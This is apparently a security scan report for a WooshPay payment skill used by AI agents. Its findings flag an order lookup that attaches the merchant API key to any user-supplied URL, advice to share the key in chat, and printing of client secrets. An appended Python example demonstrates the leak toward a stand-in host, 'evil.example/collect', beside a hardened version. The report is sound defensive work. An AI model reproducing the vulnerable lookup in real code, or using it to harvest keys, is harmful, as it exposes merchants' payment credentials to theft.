wooshpay-api

Security checks across malware telemetry and agentic risk

Overview

This WooshPay skill mostly matches its payment-management purpose, but it can expose a merchant API key through unsafe URL handling and poor secret guidance.

Review carefully before installing. Use only a restricted WooshPay key if possible, set it locally through an environment variable or secret manager, do not paste it into chat, do not pass full URLs to the order lookup script, and verify every payment or refund before confirming.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Taint Tracking: Direct Taint Flow, Variable-Mediated Taint Flow, Credential Exfiltration Chain
  • MCP Least Privilege: Underdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
Findings (9)

Tainted flow: 'url' from input (line 70, user input) → requests.get (network output)

Medium
Category
Data Flow
Content
    print(f"\n⏳ Looking up order {order_id}...")
    
    try:
        response = requests.get(url, headers=headers, timeout=30)
        
        if response.status_code == 200:
            result = response.json()
Confidence
99% confidence
Finding
response = requests.get(url, headers=headers, timeout=30)

Tainted flow: 'headers' from os.environ.get (line 62, credential/environment) → requests.get (network output)

Critical
Category
Data Flow
Content
    print(f"\n⏳ Looking up order {order_id}...")
    
    try:
        response = requests.get(url, headers=headers, timeout=30)
        
        if response.status_code == 200:
            result = response.json()
Confidence
99% confidence
Finding
response = requests.get(url, headers=headers, timeout=30)

Lp3

Medium
Category
MCP Least Privilege
Confidence
91% confidence
Finding
The skill documentation indicates use of environment variables and outbound network access to a payment gateway, but no permissions are declared. In an agent ecosystem, undeclared sensitive capabilities reduce transparency: users or orchestrators may invoke the skill without understanding that it reads credentials and talks to an external system that performs financial operations.

Intent-Code Divergence

Medium
Confidence
99% confidence
Finding
The script explicitly tells users they can provide their API key 'directly in conversation,' which encourages disclosure of a secret through a chat interface rather than secure local configuration. In an agent setting, that can cause credential exposure to the assistant runtime, logs, transcripts, or downstream tooling that should never receive long-lived secrets.

Context-Inappropriate Capability

High
Confidence
99% confidence
Finding
This is a direct credential leakage flaw: the code accepts an arbitrary URL and unconditionally attaches the WooshPay API key in a Basic Authorization header. In the context of a payment gateway integration, compromise of this key can expose sensitive payment operations and account data, making the issue especially dangerous.

Missing User Warnings

Low
Confidence
84% confidence
Finding
The skill instructs users to export a live API key but does not warn that the credential is sensitive or advise against exposing it in logs, terminal history, screenshots, shared shells, or committed config files. Because this is a payment gateway key, accidental disclosure could enable unauthorized payment actions, order queries, or refunds depending on account scope.

Missing User Warnings

High
Confidence
96% confidence
Finding
The script prints client_secret directly to the console, exposing a sensitive payment token to anyone with terminal access, logs, transcripts, or command capture. In payment workflows, client secrets can be abused to continue or inspect payment flows and should be treated as confidential.

Missing User Warnings

High
Confidence
99% confidence
Finding
Allowing arbitrary URL input for lookup while silently sending the Authorization header creates a high-risk exfiltration path. The absence of any warning or confirmation increases the likelihood of accidental or social-engineering-driven disclosure of the WooshPay API key.

Ssd 3

High
Confidence
99% confidence
Finding
Instructing users to disclose an API key to the assistant is a direct secret-handling anti-pattern. Because this skill is explicitly meant to operate with a privileged payment API credential, the guidance materially increases the chance of credential leakage and unauthorized payment or refund operations if the secret is later exposed.
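The credential-leakage pattern the findings above describe (an order lookup that accepts an arbitrary URL and always attaches the Basic Authorization header, and a script that prints client_secret), shown next to a hardened form that follows the overview's advice: take an order id rather than a URL, build the request against a fixed host, load the key from the environment, and redact the secret before printing. This is an added example, not code from the wooshpay-api skill. The base URL https://api.wooshpay.example, the WOOSHPAY_API_KEY variable name, the "key:" Basic-auth credential format, and all sample values are assumptions for illustration.

```python
"""Added example (not the wooshpay-api skill's own code): the flagged
credential-leakage pattern next to a hardened lookup helper. Placeholder
host, env var name and auth format are assumptions, not documented values."""
import base64
import os
import re
from urllib.parse import quote, urljoin, urlsplit

# Assumed placeholder; the real WooshPay API base URL is not on this page.
WOOSHPAY_BASE = "https://api.wooshpay.example/v1/orders/"
ALLOWED_HOST = urlsplit(WOOSHPAY_BASE).hostname

# Order ids are restricted to a safe character set so they can never
# smuggle a path, scheme or host into the constructed URL.
ORDER_ID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def basic_auth_header(api_key: str) -> str:
    # Assumption: the key is sent as the Basic-auth username with empty password.
    token = base64.b64encode(f"{api_key}:".encode()).decode()
    return f"Basic {token}"


def vulnerable_lookup_request(url: str, api_key: str) -> dict:
    """The flagged pattern: the caller supplies the full URL and the merchant
    key is attached unconditionally, so any host named by the user (or by a
    prompt-injected agent) receives the credential. Returns the request it
    would send instead of sending it, so the leak can be inspected offline."""
    return {"url": url, "headers": {"Authorization": basic_auth_header(api_key)}}


def safe_lookup_request(order_id: str, api_key: str) -> dict:
    """Hardened form: accept an order id, never a URL; build the URL against a
    fixed base; re-check scheme and host before attaching the credential."""
    if not ORDER_ID_RE.fullmatch(order_id):
        raise ValueError("invalid order id")
    url = urljoin(WOOSHPAY_BASE, quote(order_id, safe=""))
    parts = urlsplit(url)
    if parts.scheme != "https" or parts.hostname != ALLOWED_HOST:
        raise ValueError("refusing to send credential to unexpected host")
    return {"url": url, "headers": {"Authorization": basic_auth_header(api_key)}}


def load_api_key(env_var: str = "WOOSHPAY_API_KEY") -> str:
    """Read the key from the environment only; never accept it from chat or argv."""
    key = os.environ.get(env_var)
    if not key:
        raise RuntimeError(f"set {env_var} in your shell or secret manager")
    return key


def redact(secret: str, keep: int = 4) -> str:
    """Mask a secret so that only its last `keep` characters remain visible."""
    if len(secret) <= keep:
        return "*" * len(secret)
    return "*" * (len(secret) - keep) + secret[-keep:]


def summarize_order(result: dict) -> dict:
    """Copy of an API response that is safe to print: client_secret is redacted
    so terminal history, logs and agent transcripts never carry the token."""
    out = dict(result)
    if "client_secret" in out:
        out["client_secret"] = redact(str(out["client_secret"]))
    return out


if __name__ == "__main__":
    key = "sk_test_constructed"  # constructed sample value, not a real key
    # The vulnerable helper happily hands the key to an attacker-chosen host.
    print(vulnerable_lookup_request("https://evil.example/collect", key))
    # The safe helper only ever targets the fixed host, and rejects URL-shaped ids.
    print(safe_lookup_request("ord_123", key))
    for bad in ("https://evil.example/orders/1", "//evil.example/x", "../admin"):
        try:
            safe_lookup_request(bad, key)
        except ValueError as exc:
            print(f"rejected {bad!r}: {exc}")
    # Constructed response; the secret is masked before it reaches the console.
    print(summarize_order({"id": "ord_123", "client_secret": "cs_constructed_9f3a"}))
```

The host re-check after urljoin is deliberate defence in depth: even if the id validation were loosened later, an id such as "//evil.example/x" would resolve to a different host and the credential would still not be attached.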

VirusTotal

64/64 vendors flagged this skill as clean.
